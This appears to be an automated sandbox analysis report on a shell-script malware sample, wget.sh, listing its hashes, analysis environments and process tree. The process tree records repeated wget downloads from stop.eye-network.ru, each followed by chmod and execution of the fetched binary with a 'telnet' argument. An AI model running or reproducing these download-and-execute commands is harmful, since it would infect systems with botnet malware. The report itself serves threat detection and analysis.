Analysis
- max time kernel: 3s
- max time network: 4s
- platform: debian-9_armhf
- resource: debian9-armhf-20240418-en
- resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 18-12-2024 13:17
Static task: static1

Behavioral task: behavioral1
- Sample: wget.sh
- Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
- Sample: wget.sh
- Resource: debian9-armhf-20240418-en

Behavioral task: behavioral3
- Sample: wget.sh
- Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
- Sample: wget.sh
- Resource: debian9-mipsel-20240418-en
General
- Target: wget.sh
- Size: 676B
- MD5: 5b3ceaec7a3ad11b45f5fca1b603d939
- SHA1: 5e5ee3fa232288f77e670c66d8ca42c0cc171e45
- SHA256: bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
- SHA512: 47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  692  chmod
  696  chmod
  702  chmod
  671  chmod
  677  chmod
  688  chmod
  705  chmod
  660  chmod
  682  chmod
  699  chmod
Processes
- /tmp/wget.sh: /tmp/wget.sh (PID:648)
  - /usr/bin/wget: wget http://stop.eye-network.ru/wkb86 (PID:650)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:660)
    Signature: File and Directory Permissions Modification
  - /tmp/wkb86: ./wkb86 telnet (PID:663)
  - /usr/bin/wget: wget http://stop.eye-network.ru/kqibeps (PID:665)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:671)
    Signature: File and Directory Permissions Modification
  - /tmp/kqibeps: ./kqibeps telnet (PID:673)
  - /usr/bin/wget: wget http://stop.eye-network.ru/bojwsl (PID:674)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:677)
    Signature: File and Directory Permissions Modification
  - /tmp/bojwsl: ./bojwsl telnet (PID:678)
  - /usr/bin/wget: wget http://stop.eye-network.ru/njvwa4 (PID:679)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:682)
    Signature: File and Directory Permissions Modification
  - /tmp/njvwa4: ./njvwa4 telnet (PID:683)
  - /usr/bin/wget: wget http://stop.eye-network.ru/ngwa5 (PID:684)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:688)
    Signature: File and Directory Permissions Modification
  - /tmp/ngwa5: ./ngwa5 telnet (PID:689)
  - /usr/bin/wget: wget http://stop.eye-network.ru/woega6 (PID:690)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:692)
    Signature: File and Directory Permissions Modification
  - /tmp/woega6: ./woega6 telnet (PID:693)
  - /usr/bin/wget: wget http://stop.eye-network.ru/fnkea7 (PID:694)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:696)
    Signature: File and Directory Permissions Modification
  - /tmp/fnkea7: ./fnkea7 telnet (PID:697)
  - /usr/bin/wget: wget http://stop.eye-network.ru/gnjqwpc (PID:698)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:699)
    Signature: File and Directory Permissions Modification
  - /tmp/gnjqwpc: ./gnjqwpc telnet (PID:700)
  - /usr/bin/wget: wget http://stop.eye-network.ru/wlw68k (PID:701)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:702)
    Signature: File and Directory Permissions Modification
  - /tmp/wlw68k: ./wlw68k telnet (PID:703)
  - /usr/bin/wget: wget http://stop.eye-network.ru/wrjkngh4 (PID:704)
  - /bin/chmod: chmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh (PID:705)
    Signature: File and Directory Permissions Modification
  - /tmp/wrjkngh4: ./wrjkngh4 telnet (PID:706)